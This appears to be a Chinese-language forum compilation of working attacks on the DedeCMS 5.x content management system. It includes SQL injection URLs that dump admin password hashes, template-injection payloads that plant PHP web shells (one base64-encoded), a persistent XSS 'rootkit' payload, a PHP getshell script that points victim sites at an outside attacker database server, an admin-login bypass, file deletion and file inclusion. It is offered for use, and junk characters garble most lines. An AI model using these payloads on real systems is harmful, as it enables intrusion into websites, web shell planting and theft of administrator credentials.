|
|
/ v+ `. a/ f& l" ?5 n' S" m, WDedecms 5.6 rss注入漏洞; h( C( r* b. i1 d. b: ?
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1! E) t: }$ {9 g
# B# j$ ]( v/ I9 x& g
! g1 L4 u; c' V) g+ u
: u& y! Z% ]1 ~" E3 i7 M
5 ~, |' B5 T8 N6 R+ l& Y. n0 _2 b" j( p
8 Z( Z2 k; M" a" R$ [* U4 h" H: Z2 R
* P# S1 O; D1 p% `
+ V1 @" [2 g0 \, Y' XDedeCms v5.6 嵌入恶意代码执行漏洞
$ Q( _! P+ H" S) |% o% m注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
1 e- x/ U2 O4 g7 k发表后查看或修改即可执行
& S5 |1 R" _* T" W0 fa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
9 E( ?% S6 g4 N/ d5 y生成x.php 密码xiao,直接生成一句话。" E1 R& P% X9 W% O
* n& {( C* W6 m$ L. V6 \8 ^: l
6 y$ a3 C* P" E: G# h l0 I2 C$ _4 m% {. {$ U9 s
5 N4 \: e7 r$ @& J: V' g( J3 s) t0 a
, W/ B: ? D+ y! h3 R
, v l" f; t1 e+ v2 `( _
! t# G/ P0 D+ Y1 ]5 q* s1 z" j$ X4 l3 I/ H+ T. V# x
Dede 5.6 GBK SQL注入漏洞9 b4 v, l. ~( ]0 X% S0 h1 T5 m& n
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';, ^* V) q- f: e% f4 s; H
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe1 W6 V+ `( }7 g
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
$ f+ [6 u& k& K' Q/ h7 s8 q1 ?) l: a
7 L8 b. e+ z5 b. J5 O; _3 D8 N
& G6 D( f w& b! r5 c3 n
3 R# y8 J3 P3 S: a# m/ ^0 Q
* \1 v: X% y+ [2 q/ S2 a+ y% w) ]8 H6 E* q
; b: j( G* z% H) i$ u$ ~3 A2 y3 g. v `* `' {+ }, Y: q
5 z( a; y# |& e$ y/ d( S$ mDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
( c% G+ X2 \' l y2 Q6 ghttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
( R( V, c, L2 m+ X: h8 E" }) x& W2 Z( R& b1 a" o5 P
1 @$ Y( d' Z7 ]
3 [$ S# h, ]: A9 V
" G0 [& V7 o+ @& P' a
* a$ k! V+ M6 c3 v7 e8 s6 ]& f5 [9 S
DEDECMS 全版本 gotopage变量XSS漏洞
0 q4 d; v! D, c, ]5 E- h1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
8 | h9 X5 \0 R. qhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
4 ~2 c% J& v' s8 b, ]1 ?) V3 q# p+ y. v- X. F/ V
, _# H/ h: K4 A. Q8 O2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 6 Y4 H) p {1 E# U* V1 c6 w
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
7 \/ n" _2 V, `2 o$ N) t
' X& m" n9 v: f& l# Y8 W9 X* U; P/ a7 p* k* ~/ `" \4 u2 T
http://v57.demo.dedecms.com/dede/login.php
5 N2 @: a/ p& Y$ [" H
3 y+ w8 Z# Y' r8 w5 ^* v) q4 U1 |9 Y q( C$ ?, n7 L
color=Red]DeDeCMS(织梦)变量覆盖getshell9 }8 L( R! P5 S% O- }5 ^2 @5 o
#!usr/bin/php -w
, q4 L( b3 x7 F& d3 [* _4 {<?php3 x) p ~' q$ K# n4 Q
error_reporting(E_ERROR);2 ]8 S" ^/ g; N/ \& J5 J
set_time_limit(0);- j2 ^% V9 G; ^# @
print_r('
3 Q9 o# I, ?2 l8 t7 @6 W9 QDEDEcms Variable Coverage
( k& o0 n. {9 A4 n, v7 K. ] `Exploit Author: www.heixiaozi.comwww.webvul.com
" M# g0 c; |* k; X2 q. P);
9 {" G b- _ Pecho "\r\n";; Y- r u& y% y8 S9 t- ]& _) P5 g
if($argv[2]==null){
9 F3 J$ u; j$ W4 I' \, ^2 fprint_r('5 w2 L8 H' C' ?3 u
+---------------------------------------------------------------------------+( Y# \0 e+ f; g6 K0 _% b1 M
Usage: php '.$argv[0].' url aid path
: C$ n2 ? Q' [7 u- G aaid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus// T! F4 f4 b( P: Y$ w$ ]5 p
Example:
k- g* F3 ?7 Bphp '.$argv[0].' www.site.com 1 old
7 M" D4 ~2 ^+ u0 ^( @2 X& q+---------------------------------------------------------------------------+
2 G! w# `% d- I1 E; q');9 n( M. M5 g) |- l# `$ Q7 R
exit;
0 ^$ z0 d; m/ ~4 v9 p: [9 k}8 H4 a$ y Q! b2 Q$ ^2 h
$url=$argv[1];
8 F/ x$ z/ a( }% | G$aid=$argv[2];
9 Q& e9 P0 K2 b! l# S$path=$argv[3];3 a! V$ u) n6 ?7 B
$exp=Getshell($url,$aid,$path);2 R! \ W: W3 d, w
if (strpos($exp,"OK")>12){
7 L2 l% Z2 X! W7 A$ Fecho "
1 X* q& n: e7 a! w2 sExploit Success \n";5 [9 V( E& T9 k$ H( O
if($aid==1)echo "% I; H/ k& j4 U, o: _& R% ~3 j
Shell:".$url."/$path/data/cache/fuck.php\n" ;: g% {5 B* F: s6 }) Q0 c7 p2 y; U
: x9 y: ^1 K) D. r- |
, w& t8 b) a$ }1 {, w: Eif($aid==2)echo "8 O. W; a8 d2 R. Q1 i
Shell:".$url."/$path/fuck.php\n" ;; F1 n' n* I U' P2 q) ]" i. n$ [
! e) Q. m9 Z6 d2 X" Y& h
8 w' k7 f2 T1 q- E$ V9 lif($aid==3)echo "% I7 I) V# D v
Shell:".$url."/$path/plus/fuck.php\n";
4 ]: S0 i* u0 q7 H
: k% \3 m1 y1 x+ q( `! u7 Z/ j
% q& s I, u1 e8 S0 I}else{
+ {+ Y0 |( d; a6 m; a4 W$ Y9 W2 yecho "/ `) y1 c* X( G5 O# v" k
Exploit Failed \n";
, ?0 N I9 p; F9 n+ T! @* b}
* C2 j+ Z4 O% J c h. l2 D$ Rfunction Getshell($url,$aid,$path){
& J: ]5 T, S u$id=$aid;
5 T% m, M; i/ d5 V+ Y7 ]' E" `$host=$url;
- e S6 M7 C! ]( M0 }; P- f$port="80";
3 o5 k9 T" D4 [$ z z4 M$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";7 G/ o a5 G ]8 B7 L2 w( \
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";/ k9 i5 u9 n& D' {, X4 I
$data .= "Host: ".$host."\r\n";1 H& E2 A) i! o @) W$ I
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";4 E, ] g+ D9 i/ p: |+ D) K
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
6 N! o6 v8 N3 e6 [$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";% E( s" _$ R( R& a3 c
//$data .= "Accept-Encoding: gzip,deflate\r\n";
) b! ~% j( p4 X3 q0 v3 w9 l$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
! V' ]9 t. H6 o6 C N$data .= "Connection: keep-alive\r\n";& e8 g# L4 c a$ L' q, m1 j
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";6 g3 k/ P, l" B' O0 M+ o% }6 c
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
# R l! E/ O6 a' X" M$data .= $content."\r\n";. C' q; X& B: d" \ J
$ock=fsockopen($host,$port);( }" F8 L& ~* V1 l. t9 }6 T6 _$ V
if (!$ock) {9 p8 p7 H8 \/ G. q2 c) a% S
echo "
% c- D& X2 N6 [# T7 F; w2 ONo response from ".$host."\n";* h A3 @" X4 I
}' e8 \* `' n4 O5 y9 n0 l5 t
fwrite($ock,$data);0 b. F9 K' v% U! @, b
while (!feof($ock)) {0 X H& i5 r- l6 P' U0 k
$exp=fgets($ock, 1024);
1 V9 y0 @8 Z$ I( ~* Wreturn $exp;+ F1 t1 ^5 s$ T. c
}
# K [+ J) N" y, ^% W6 U Z, l}
( j5 ? h, O8 n! X0 z0 y) X
% {; g$ J0 x* ?1 f# E
$ z1 b% n0 U7 p% [?>
6 u5 G1 A- o7 b; B; N7 @) v0 o+ r) H- A
6 J( @$ ?. M# M& K7 p% A
7 F$ G2 q" x; }8 B0 \0 x$ A- j' {; z& ?9 y
; g/ u' A& ]" N# |0 L M9 I, P8 _& J/ G$ ^2 f, `- `, r( x! I: J- ]3 P
1 U; g5 d3 V( R, N6 b
+ W: n0 t# V8 P7 {% L, l+ }, a9 f, x3 D$ p! V J
+ n! E. G( G; A# H5 v/ H" F# F: LDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)4 D+ u/ \# T$ C
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
. h+ }) F& @9 F
- j, h& R" C2 V( c* `, V
7 O! p; \: @2 X1 b: }7 p把上面validate=dcug改为当前的验证码,即可直接进入网站后台, M/ H* z) _( k- p6 q/ R
/ @3 {% m9 ^: C4 ~+ h" Q+ ]
" v# X& w5 T( K
此漏洞的前提是必须得到后台路径才能实现 T( r7 h' Y; p2 k
8 D& M6 L; a$ y! E, u ?/ n9 i* ~$ n3 d7 P
6 k* ^. q0 G$ }1 `) g& X
3 M% F! h8 g: f. H, X/ c
i0 F! Q7 p, k- P% x# n
+ D' G: h# w" m' ~# {' u5 V, M- q0 ^/ x/ Q; E3 {' A& {1 O" ^7 H* h
4 Q( t1 a6 \- E
% a. U8 I" e" N" _* q' S5 ~6 M3 H+ i% \1 q# `3 X* ]0 X ?2 O
Dedecms织梦 标签远程文件写入漏洞
- D, _' F8 O/ \& E1 ^前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. V8 c/ n3 l) F" C. C" `; q8 x( k
. z) D' B; H8 U( P$ V
* [( w6 I. r4 V8 d再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 9 T& P: l. I. g/ Y) U
<form action="" method="post" name="QuickSearch" id="QuickSearch">
* }6 K8 l- i5 w% A: }, ]<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />) o* H$ S3 R) H+ u! L
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* ]1 e2 S, x7 P* c& ^5 d. [3 C
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />$ A' o/ t! ^( Y( ~& T6 u' E6 c& F
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 t- w& _: p9 S% E- J<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />4 s+ h; w6 X3 a+ j7 h
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />8 y3 z3 y+ y0 s) J+ f3 j
<input type="text" value="true" name="nocache" style="width:400">! b5 M% j$ i+ c. k9 _! l6 p5 g
<input type="submit" value="提交" name="QuickSearchBtn"><br />; A5 K3 y3 H, a, `2 M P
</form>
" ~! m2 m5 @+ A4 |<script>
; ~1 u, g7 P# j7 gfunction addaction()
4 O0 m# n9 x( p, E/ A1 _0 E2 p" C{
+ v' }. I. A& E+ r: @: U; rdocument.QuickSearch.action=document.QuickSearch.doaction.value;
+ v) ^; \: n; B}' }3 ~( ^) R H W* ^
</script>
% {% ?: u4 s5 ]8 v' O2 \
! `* c7 j$ x N/ \9 N+ m4 {5 t7 D E, U' C' R: j
! ~7 F* t9 F- @" [" y4 M& |( V
( e. q. |6 N3 d* N) S
* o7 n4 h1 B" \9 G _3 H& N
2 ^ b0 U0 r1 T& K# g! E; P, B% m8 f9 r% @+ \7 R
0 N3 g5 a/ b7 ]& k6 N7 P7 D9 f/ o* b# K8 }
2 q6 V1 M) c7 G! q: g" [4 e7 k( A& J, M
DedeCms v5.6 嵌入恶意代码执行漏洞) M; w- V3 [2 m$ F' p9 ~
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行. f i o" L% w3 I. ^; Q& G
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
" K( `7 W3 H+ Q1 ]" d5 Q4 C生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
S% ]/ Y W% Q: l; a& }Dedecms <= V5.6 Final模板执行漏洞
" r3 @* l) A0 M6 j. ^6 g. t4 N& E注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
( k4 ~( k8 q# d5 @" H) _uploads/userup/2/12OMX04-15A.jpg
9 f- C" q7 E1 ~" w3 q
) j7 Q6 ]& [0 K/ y( E
. W/ o) w# K7 b) S3 `模板内容是(如果限制图片格式,加gif89a):
/ e- b# U2 I% m) z/ ~{dede:name runphp='yes'}
6 p% k9 r! K6 g, f3 G( f$fp = @fopen("1.php", 'a');
* N9 F+ @$ ` y- j# B( ?* K8 B@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
. ~( |& P, ~& R@fclose($fp);
0 R. X; o0 ]( K+ ]0 A/ e2 Q, S2 O2 k{/dede:name}
) k R' P8 `# e( J2 修改刚刚发表的文章,查看源文件,构造一个表单:
" B7 u8 O/ m+ U- ~9 c<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
. ]- c ?! E. k; j5 f6 R+ p<input type="hidden" name="dopost" value="save" />
! \$ c. {- [( P<input type="hidden" name="aid" value="2" />
4 D8 v9 B! |# J1 r5 }9 s/ u) v<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />9 q% Y( u5 \9 T! D& x0 M j8 i
<input type="hidden" name="channelid" value="1" />% a D) Q2 z ~
<input type="hidden" name="oldlitpic" value="" />
( [5 ~5 J) L _( Z<input type="hidden" name="sortrank" value="1275972263" />
2 B, v$ F# J# J/ Q# ^" H' F
2 |6 b6 k4 Q* i
9 v. C" X; L2 `<div id="mainCp">
- Z% H3 E) u, J* [1 j+ `<h3 class="meTitle"><strong>修改文章</strong></h3>
% w, f2 T3 k7 J% Q$ c% {2 o8 L/ D5 f' m( Q% R
5 C3 G" p- ^) I# x" n( s<div class="postForm">3 ?) _& ~5 l J
<label>标题:</label>
% l4 q0 x$ X' q* e; K* f<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>3 J$ o+ p6 ~! K0 o) t [
- C8 ^; Y2 R7 M& k% l. c* }% j
0 S+ \' g, N2 L0 {9 m1 t2 b<label>标签TAG:</label>
+ y: j5 l+ J9 @ ?! D. I<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)% v' G& Y7 M& ~# T" `6 c, h
# |8 `" |0 H3 f; T' p) d L: V+ D( y* d4 e- f
<label>作者:</label>
2 e- E# `/ G8 O; m6 h+ `<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>4 g1 o- c" u- H9 Z; X; q$ b/ F
( R* X; Z& r3 h$ K5 N3 x- v$ Z& T, t+ p1 Z2 H; ]1 ?
<label>隶属栏目:</label>5 m4 ^/ i' B7 G4 |5 a) ]: i: q1 b
<select name='typeid' size='1'>
/ r2 H: ]9 o9 H# B8 Q: h4 A<option value='1' class='option3' selected=''>测试栏目</option>. d( R5 E; D9 x- V* z. n: T3 ]
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
$ R2 E/ _5 k' e' T" u
, p3 h1 s7 l* s' G" d+ T
( I+ p" e9 F$ `% q8 x3 ?3 b<label>我的分类:</label>
7 c& p2 p) ?, f1 G1 S' U* ^<select name='mtypesid' size='1'>
+ y/ h- O0 s5 u<option value='0' selected>请选择分类...</option>
! N* ?: J1 |4 R7 d& M; q<option value='1' class='option3' selected>hahahha</option>
& v+ _) G( `* {4 w7 w</select>
) b* M- Q. h, ]6 h" c
0 q( {. ]& G: A1 W, Q% O% ~
, q5 [: F7 L! k' I, W0 h<label>信息摘要:</label>
, \6 Q" `, D& D) {7 d) j<textarea name="description" id="description">1111111</textarea>
) R$ [3 I& \# c+ d' T. O3 y(内容的简要说明)
/ I% _7 l1 U+ E' b8 u7 L" u3 J' R; f! r; f" W) K
/ m# b, F4 V" v7 O& e# [
<label>缩略图:</label>
4 V5 e1 K) C& ]9 P6 W3 ?4 t) X<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
& f8 C6 k; d3 E/ i S' `* L" z- T7 P! N9 \" V2 P
9 p+ R( z# d$ R% i6 d( G/ `: {<input type='text' name='templet'
0 C5 ^4 s. g6 ^9 Zvalue="../ uploads/userup/2/12OMX04-15A.jpg">" r/ j. Z G: q: G( P
<input type='text' name='dede_addonfields'" n$ o! [# x* Z. D) @. a
value="templet,htmltext;">(这里构造)3 i; `+ @1 S, l1 g( x4 Q8 v0 T: j
</div>
6 F5 B- W, D8 X' n! c2 }( C0 {( z" v2 |: z
) M0 K/ ^' M" K5 J
<!-- 表单操作区域 -->6 W% n) Z7 q9 m+ @; @
<h3 class="meTitle">详细内容</h3># s/ _1 z" z! H/ c8 d$ A/ @1 q
. _- C% N' f7 E% W# l$ B, p: p) o) l! r B8 U6 b
<div class="contentShow postForm">
* T0 Z3 T8 k' K7 @' S; O; o<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
: O2 ?: K5 Q" C! S4 O" x7 ^4 v$ C/ v" b; h
8 N/ R0 B) Y @% V<label>验证码:</label>- Y* O% {5 ?( i5 Q0 R8 f; S. f
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
) y, w1 D) E2 D7 w& y0 r+ x<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />9 d! P6 t7 g+ q5 _/ j! [/ a
a' D3 K2 k) ^7 k5 v8 k
0 v- G. b9 E; ^5 b, B<button class="button2" type="submit">提交</button>) c& K' F# V! C' l
<button class="button2 ml10" type="reset">重置</button>5 Y k# [( Z6 f# ~" ]8 _, i
</div>" ^- r) \/ K9 H" o x6 O5 {5 f
+ v7 K- {& i4 B4 z
5 P V2 S3 ?4 I# t- ^) `7 Z3 S! v</div>, c# G! q2 l6 z
2 G: @. C- e7 G0 A
* \; [ _2 R+ q) p. l/ a3 J* g</form>1 F4 O4 @9 G6 u% ]8 j d
3 u: i2 i- @# y0 ^* [
1 k- Z, {3 H0 X8 M) e2 \/ ]) ]提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
9 l$ f. X# v/ G& {6 Z$ W假设刚刚修改的文章的aid为2,则我们只需要访问:
; `6 ^4 l! w! ^, [* ahttp://127.0.0.1/dede/plus/view.php?aid=2
! J# `5 h! D: e6 d$ A$ c5 l即可以在plus目录下生成webshell:1.php
7 A4 Q' ~6 p% S4 z' R1 S! N) U z7 C; S" H1 ]% R, k
! ~) Z2 h1 L5 N4 T
+ B8 k, j+ [ i$ M
4 d& T9 @ i, G- [7 w
# Z9 N% E+ X# a2 T6 d- m9 U2 w# H' S( u$ P. w# J; o! ~
$ {$ H- q: W3 a4 y" j% @" H! |: Z6 `
* J) U9 M5 Q7 w6 G# X* d! s, H4 ]- V
: u% i2 K d9 q1 `% j; h
* q: C a6 O" b: T- a- x' bDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
9 p! q, Z+ S; y# J, A. l+ JGif89a{dede:field name='toby57' runphp='yes'}3 i9 d7 ] Z6 f5 K% B
phpinfo();! @4 O" ?4 B; M+ o* l+ c1 x( x. t
{/dede:field}
7 |: w% `& L% P: `- F9 J6 |; k. v保存为1.gif
' h0 W7 w/ f; j+ T7 y% [<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
- e6 v' P: a; \; a1 w<input type="hidden" name="aid" value="7" /> + h9 V" h6 g, r, P* S4 a8 d: \
<input type="hidden" name="mediatype" value="1" /> * J E2 }3 M( M& i9 \# J# T1 D
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
$ r8 o( B+ x' V) k$ c% k<input type="hidden" name="dopost" value="save" /> $ J2 n/ O0 ]2 n4 c
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 4 O* U* S+ K! ?4 q3 Y% R* N
<input name="addonfile" type="file" id="addonfile"/>
" |! r- ^+ I- D2 I4 o1 r. ?4 O<button class="button2" type="submit" >更改</button>
, Z! O. Q: A3 ?- _% ~) q8 G& G$ H</form>
+ k1 [9 E) K U
1 m& }) S# Q$ E" V* A) I1 c- F; K& Q! v% P2 @! |+ o
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif' q3 C" |1 T/ E
发表文章,然后构造修改表单如下:
5 T+ S3 D' Z( N% o; o, ]1 ]+ [7 y
/ {/ z. k6 R2 ]<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
) M% a* H, Z0 a7 @6 {/ }) S<input type="hidden" name="dopost" value="save" />
* _- y& i! d4 h+ s7 @/ W Z4 l<input type="hidden" name="aid" value="2" /> * F8 h! J; x. o1 u
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
' E% [& h# f, I1 w7 i( s<input type="hidden" name="channelid" value="1" /> / B3 C& j6 C6 i! P
<input type="hidden" name="oldlitpic" value="" /> % x1 e. Y# L9 \* I$ E$ y2 @- }
<input type="hidden" name="sortrank" value="1282049150" />
8 s2 p9 \' ]: ]: Y6 A) |; z1 a<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> ( S+ g2 |2 u& H& U
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
+ Z% i# L: ^5 g# Y<select name='typeid' size='1'> 2 [9 _- ?, p3 e# X
<option value='1' class='option3' selected=''>Test</option> 5 C% E) } f2 W: o9 F
<select name='mtypesid' size='1'>
1 |% d" ?) s8 L7 Q5 E* ^<option value='0' selected>请选择分类...</option>
( u* r# x; h$ k+ a1 x4 d<option value='1' class='option3' selected>aa</option></select>
. M6 M& L' O1 ~% A7 u<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
9 X; n+ z( [- f7 m! V7 \2 v<input type='hidden' name='dede_addonfields' value="templet">
3 n- G; `9 I2 a7 L. e; I, @' |5 e<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 9 K8 ~% S( ]1 M' z r/ `5 Y& D& K
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
5 z7 W2 m/ C# z. |6 n3 z<button class="button2" type="submit">提交</button> . o4 U" V7 v) O& I
</form>
) Y" D& [5 O7 v
1 {( Z3 j& t2 Y& Z" o' y4 |! p$ }! ]4 Z; C
. I2 q% ?5 n% P3 s9 P' U9 M9 A( M+ P/ ~6 \ w R( `2 Y
9 f% ?) O% V# g, \
5 ]" x' D! w/ N. m" `% u
3 ?2 B9 P& H( ]& z: N6 l4 J j, ]" r$ }: O8 e% N
8 z9 W; V, s" D8 v$ M: Q0 g: w
6 e% ~+ J1 f+ A; ?( ^' V2 K6 G; B# A) _- \' e7 H% d% H
; Y( [# `) @! P2 R+ G
织梦(Dedecms)V5.6 远程文件删除漏洞
" m) f; ]' R2 k4 v! Z- bhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif$ H# h8 y: t" H0 \6 y: Y, X$ O
6 o- W( k# H4 `- E1 f* w/ c7 c
% J1 P5 w1 G+ L6 G2 v! a- O- A; r
! k) U7 `. X: M( W, Q1 \4 a8 c/ u; @: q4 I7 q
3 k% q4 p" t, k* F0 c* d2 Z
0 g2 H8 V0 T0 s* W6 K" X9 v' P2 a# ~$ A X4 ?" t" n
- ?3 J5 ^1 D2 M4 t- \3 E' l* S+ ^; k
c9 M) r# q/ Y$ P$ K. O
- T, G7 k- `: F' v; I, c& |# ?; n1 ]织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
! [" ~/ \; k: K9 |2 @* X" qhttp://www.test.com/plus/carbuya ... urn&code=../../
5 e# w# o0 y5 {& G: e* R# B% k2 P# ?1 s) D
5 _0 I! a' G' W, z3 I
/ \" M5 R# q: W3 u7 @8 w: h; S& ^
* k8 T2 f$ @( o! N" L% S/ }, y P2 O% f, Y
! v. c% `( G% s. C/ E$ C
$ O6 Q9 c/ }9 p( Q
: C4 ~! I( x$ k/ R' |* B0 K
, H! [8 U/ P1 W# ?
' T4 E' C( k7 K9 g- m. P/ A/ RDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
; Z) | ~, M' ?- v6 nplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
\2 u4 o# ^" M7 G, n. E2 q1 c密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5) |- L9 A1 w, }. F0 U+ l$ B8 O3 ~
/ G" v6 D; T3 _$ E# T6 s
( Y8 l# z* h* X& ]* w5 A2 Z
6 R4 w" |- _ Z; P
" J- _9 ^# K. {4 C0 ^$ o
`7 U2 f7 d) F1 I3 U7 i
5 x- D6 E) X/ v4 f- C% M% L) ?4 l
: S W& C+ J+ H% ~( p8 Q0 a4 q& Y7 X/ S6 I
- ?; x5 q6 s- G
' y, J% R* t" u5 J) Q% D- ~$ O9 a4 J织梦(Dedecms) 5.1 feedback_js.php 注入漏洞: A v. n, Z+ k" p- n* D# {. W
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='" I4 ^+ Z1 e9 n0 N' L3 e* h
' B9 k V d S" ^( e, E
% @. r% Z: F+ Z
9 c5 ?( @! g( z$ o& T Z
